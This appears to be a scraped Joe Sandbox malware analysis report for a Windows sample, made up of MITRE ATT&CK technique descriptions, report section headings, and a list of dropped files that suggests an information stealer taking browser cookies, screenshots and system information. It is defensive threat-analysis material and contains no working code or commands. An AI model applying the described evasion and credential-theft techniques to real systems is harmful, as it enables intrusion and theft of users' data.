Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MzRn1YNrbz

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\4YYGUQ5HBW956C5CCOF\d06ed635-68f6-4e9a-955c-4899f5f57b9a2092031932.zip

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\Cookies\Google Chrome_Default.txt

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\Files\Default.zip

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\information.txt

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\screenshot.jpg

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\temp

C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

C:\ProgramData\vcruntime140.dll

C:\Users\user\AppData\Local\Microsoft\0boUgmEouuadut_s

C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe

Windows Analysis Report
MzRn1YNrbz

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre